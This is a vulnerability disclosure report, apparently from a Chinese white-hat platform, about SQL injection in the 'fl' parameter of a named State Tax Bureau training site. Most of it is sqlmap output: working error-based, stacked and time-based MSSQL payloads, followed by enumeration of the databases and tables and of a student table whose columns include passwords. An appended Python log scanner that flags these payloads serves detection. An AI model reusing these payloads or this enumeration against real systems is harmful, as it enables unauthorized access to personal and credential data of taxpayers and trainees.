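2015-04-29: Details reported to the vendor; awaiting vendor handling
2015-05-04: Vendor confirmed; details disclosed to the vendor only
2015-05-14: Details disclosed to core white hats and relevant domain experts
2015-05-24: Details disclosed to regular white hats
2015-06-03: Details disclosed to intern white hats
2015-06-18: Details disclosed to the public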
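The issue is in the so-called "Taxpayers' Home" (纳税人之家) and "Taxpayer Online School" (纳税人网校) sites.
http://ws.bzsqgs.com/YC_xwList.aspx?fl=1: the GET parameter fl is vulnerable to SQL injection.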
sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Parameter: fl (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: fl=1' AND 4372=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4372=4372) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113))) AND 'bCqq'='bCqq

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: fl=1'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: fl=1' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] YC_GuoShuiJu
I enumerated one of the databases:
back-end DBMS: Microsoft SQL Server 2005
Database: YC_GuoShuiJu
[42 tables]
+----------------------+
| WX_Tixing            |
| WX_hangye            |
| WX_info              |
| WX_kaoshi            |
| WX_kecheng           |
| WX_ksResult          |
| WX_lanmu             |
| WX_lwkc              |
| WX_pxkc              |
| WX_sheying           |
| WX_shoucang          |
| WX_shouke            |
| WX_shouke_r_xuesheng |
| WX_tiku              |
| WX_tongzhi           |
| WX_xianqu            |
| WX_xuanxiang         |
| WX_xuesheng          |
| WX_yijian            |
| YC_bmzhanghao        |
| YC_bumen             |
| YC_daan              |
| YC_huifu             |
| YC_lanmu             |
| YC_liuyan            |
| YC_lyfenlei          |
| YC_mingan            |
| YC_quanxian          |
| YC_users             |
| YC_xiazai            |
| YC_xinxi             |
| YC_xqfenlei          |
| YC_xuqiu             |
| YC_xzfenlei          |
| YC_yonghu            |
| YC_zbsj              |
| YC_zhiban            |
| YC_zhuanjia          |
| YC_zjliuyan          |
| htlm                 |
| jubao                |
| jubaohuifu           |
+----------------------+

Database: YC_GuoShuiJu
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| dbo.YC_daan              | 346     |
| dbo.YC_xinxi             | 248     |
| dbo.WX_shouke_r_xuesheng | 148     |
| dbo.WX_xuesheng          | 129     |
| dbo.YC_zhiban            | 123     |
| dbo.YC_huifu             | 82      |
| dbo.YC_liuyan            | 66      |
| dbo.WX_info              | 43      |
| dbo.htlm                 | 36      |
| dbo.YC_xqfenlei          | 29      |
| dbo.YC_zhuanjia          | 28      |
| dbo.WX_xuanxiang         | 16      |
| dbo.WX_hangye            | 14      |
| dbo.WX_lanmu             | 12      |
| dbo.WX_Tixing            | 11      |
| dbo.WX_xianqu            | 10      |
| dbo.WX_tiku              | 9       |
| dbo.jubao                | 7       |
| dbo.WX_kecheng           | 7       |
| dbo.YC_lanmu             | 7       |
| dbo.YC_lyfenlei          | 7       |
| dbo.YC_quanxian          | 7       |
| dbo.WX_shoucang          | 5       |
| dbo.WX_shouke            | 5       |
| dbo.YC_xuqiu             | 4       |
| dbo.YC_bumen             | 3       |
| dbo.YC_mingan            | 3       |
| dbo.YC_yonghu            | 3       |
| dbo.jubaohuifu           | 2       |
| dbo.YC_xiazai            | 2       |
| dbo.YC_zbsj              | 2       |
| dbo.YC_users             | 1       |
| dbo.YC_xzfenlei          | 1       |
+--------------------------+---------+

Database: YC_GuoShuiJu
Table: WX_xuesheng
[22 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| gsdz      | varchar  |
| gsmc      | varchar  |
| guhua     | varchar  |
| hyId      | int      |
| id        | int      |
| jifen     | int      |
| lastTime  | datetime |
| lastTime1 | datetime |
| LastTime2 | datetime |
| mail      | varchar  |
| pwd       | varchar  |
| sjh       | varchar  |
| spKcIds   | varchar  |
| sshy      | varchar  |
| uName     | varchar  |
| xb        | int      |
| xqId      | varchar  |
| xqmc      | varchar  |
| xuehao    | varchar  |
| yzsjh     | varchar  |
| zcsj      | varchar  |
| zsxm      | varchar  |
+-----------+----------+
It contains data.
All of it relates to companies attending training at the State Tax Bureau.
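The three techniques sqlmap reports for the fl parameter (error-based CONVERT, stacked queries, time-based WAITFOR DELAY) leave recognisable traces in web-server access logs. The following is an added example, not part of the original report, that flags them in IIS-style log lines. Assumptions: the log lines and their field layout are constructed, and fl is treated as a plain decimal id because the report's URL uses fl=1.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines; assumed field order:
# date time method uri-stem uri-query client-ip status time-taken-ms
SAMPLE_LOG = """\
2015-04-29 02:11:03 GET /YC_xwList.aspx fl=1 198.51.100.7 200 46
2015-04-29 02:11:09 GET /YC_xwList.aspx fl=1%27%20AND%204372%3DCONVERT(INT%2C(SELECT%20CHAR(113))) 203.0.113.9 500 61
2015-04-29 02:11:15 GET /YC_xwList.aspx fl=1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 203.0.113.9 200 5043
2015-04-29 02:11:21 GET /YC_xwList.aspx fl=1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 203.0.113.9 200 5038
2015-04-29 02:12:40 GET /YC_xwList.aspx fl=3 198.51.100.7 200 51
"""

# Allowlist: the only shape a legitimate fl value is assumed to take.
INTEGER = re.compile(r"[0-9]{1,9}")

# First match wins, so "; WAITFOR DELAY" is labelled stacked-query, as in the report.
RULES = [
    ("stacked-query", re.compile(r";\s*(waitfor|exec|declare|insert|update|delete|drop)\b", re.I)),
    ("time-based", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("error-based", re.compile(r"=\s*convert\s*\(\s*int\s*,", re.I)),
]

def classify(value):
    """Return None for a well-formed integer id, otherwise a label for the anomaly."""
    if INTEGER.fullmatch(value):
        return None
    for label, pattern in RULES:
        if pattern.search(value):
            return label
    return "non-integer"  # anything else that is not a plain id is still suspicious

def scan(log_text, param="fl"):
    """Return (client_ip, label, time_taken_ms) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 8:
            continue  # skip W3C header lines and malformed rows
        query, client_ip, taken_ms = fields[4], fields[5], fields[7]
        # parse_qs percent-decodes the value before it is matched
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            label = classify(value)
            if label:
                findings.append((client_ip, label, int(taken_ms)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The time-taken field corroborates the two WAITFOR findings: both constructed requests take just over the five-second delay.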
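Severity: High
Vulnerability Rank: 11
Confirmed: 2015-05-04 10:05
CNVD confirmed and reproduced the reported vulnerability and has passed it to CNCERT, which has forwarded it to the Shandong sub-center to coordinate handling with the organization that operates the website.
None yet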